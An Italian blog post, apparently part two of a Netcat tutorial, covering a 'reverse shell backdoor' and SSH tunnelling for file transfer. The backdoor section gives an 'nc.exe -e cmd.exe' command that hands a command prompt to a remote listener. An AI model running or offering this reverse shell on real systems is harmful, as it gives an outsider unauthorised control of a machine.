Netcat il coltellino svizzero delle reti: una mini guida (Parte 2 di 2)

Netcat reverse shell backdoor

Creare una backdoor con back connection o reverse shell come volete chiamarla è veramente molto semplice. I comandi seguenti sono per un prompt di comandi remoto “standard” ovvero dove il server “invia” il prompt dei comandi al client che si collega, reverse come dice la parola stessa invece è quando avviene il contrario. Sagacee😀

Bene per creare una reverse shell dovremo digitare:

nc.exe -v -L -p 12345

sul pc che agirà da server ovvero sul pc che avrà accesso al prompt dei comandi.

Mentre sul client

nc.exe -e cmd.exe ipremoto 12345

Risultato: avrete un prompt dei comandi funzionante che ci sarà gentilmente offerto dal PC client. Mi dispiace ma è veramente tutto qui..

Ssl tunneling with Netcat

Come voi saprete le connessioni che Netcat stabilisce sono totalmente in chiaro, insomma come avviene per telnet. Dunque se vogliamo usare Netcat in sicurezza non ci resta che provare con un bel tunnel Ssl.

Cosa occorre: un server Ssh funzionante e in ascolto, e ovviamente un client ssh😀

Ecco come fare ad esempio per trasferire un file in sicurezza:

 ssh -f -L 23333:127.0.0.1:3333 me@192.168.0.1 sleep 10; \
      nc 127.0.0.1 23333 | pv -b > backup.iso

Ciò vuol dire ridirigi sulla porta locale 23333 (del client) quello che vedi remotamente (quindi dal punto di vista del server) su 127.0.0.1 alla porta 3333

e metti a disposizione il file tramite netcat che ascolterà alla porta 23333.

Ora quindi per scaricare il file dovremo digitare

cat backup.iso | nc -l 3333

Fatto!

Qui sotto potete trovare una comoda cheatsheet su Netcat🙂


Una Risposta to “Netcat il coltellino svizzero delle reti: una mini guida (Parte 2 di 2)”

  1. Netcat il coltellino svizzero delle reti: una guida (Parte 1 di 2) « Untrust3d Says:

    […] Netcat il coltellino svizzero delle reti: una mini guida (Parte 2 di 2) […]


Lascia un commento

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...

%d blogger cliccano Mi Piace per questo: